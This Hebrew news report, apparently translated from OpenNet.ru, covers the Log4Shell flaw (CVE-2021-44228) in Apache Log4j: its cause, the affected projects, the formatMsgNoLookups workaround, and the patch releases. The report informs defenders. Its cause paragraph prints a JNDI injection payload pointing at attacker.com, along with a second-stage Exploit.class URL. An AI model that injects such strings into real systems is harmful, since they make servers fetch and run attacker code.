פגיעות קטסטרופלית ב- Apache Log4j המשפיעה על פרויקטים רבים של Java

ב-Apache Log4j, מסגרת פופולרית לארגון רישום באפליקציות Java, זוהתה פגיעות קריטית המאפשרת ביצוע קוד שרירותי כאשר ערך בפורמט מיוחד בפורמט "{jndi:URL}" נכתב ליומן. ההתקפה יכולה להתבצע על יישומי Java שמתעדים ערכים שהתקבלו ממקורות חיצוניים, למשל, בעת הצגת ערכים בעייתיים בהודעות שגיאה.

יצוין שכמעט כל הפרויקטים המשתמשים במסגרות כגון Apache Struts, Apache Solr, Apache Druid או Apache Flink מושפעים מהבעיה, כולל Steam, Apple iCloud, לקוחות ושרתים של Minecraft. צפוי שהפגיעות עלולה להוביל לגל של התקפות מסיביות על אפליקציות ארגוניות, החוזרות על ההיסטוריה של פגיעויות קריטיות במסגרת Apache Struts, שלפי הערכה גסה משמשת ביישומי אינטרנט על ידי 65% מ-Fortune 100 חברות.כולל ניסיונות לסרוק את הרשת לאיתור מערכות פגיעות.

הבעיה מחמירה בשל העובדה שכבר פורסם ניצול עובד, אך עדיין לא הידור תיקונים לענפים היציבים. מזהה CVE עדיין לא הוקצה. התיקון כלול רק בענף הבדיקה log4j-2.15.0-rc1. כפתרון עוקף לחסימת הפגיעות, מומלץ להגדיר את הפרמטר log4j2.formatMsgNoLookups ל-true.

הבעיה נגרמה מהעובדה ש-log4j תומך בעיבוד מסיכות מיוחדות "{}" בפלט שורות ליומן, שבהן ניתן היה לבצע שאילתות JNDI (Java Naming and Directory Interface). המתקפה מסתכמת בהעברת מחרוזת עם ההחלפה "${jndi:ldap://attacker.com/a}", בעיבוד אשר log4j ישלח בקשת LDAP עבור הנתיב למחלקת Java לשרת attacker.com . הנתיב המוחזר על ידי השרת של התוקף (לדוגמה, http://second-stage.attacker.com/Exploit.class) ייטען ויתבצע בהקשר של התהליך הנוכחי, מה שמאפשר לתוקף לבצע קוד שרירותי ב- מערכת עם הזכויות של האפליקציה הנוכחית.

תוספת 1: לפגיעות הוקצה המזהה CVE-2021-44228.

תוספת 2: זוהתה דרך לעקוף את ההגנה שנוספה על ידי שחרור log4j-2.15.0-rc1. עדכון חדש, log4j-2.15.0-rc2, הוצע עם הגנה מלאה יותר מפני הפגיעות. הקוד מדגיש את השינוי הקשור להיעדר סיום חריג במקרה של שימוש ב-URL JNDI בפורמט שגוי.

מקור: OpenNet.ru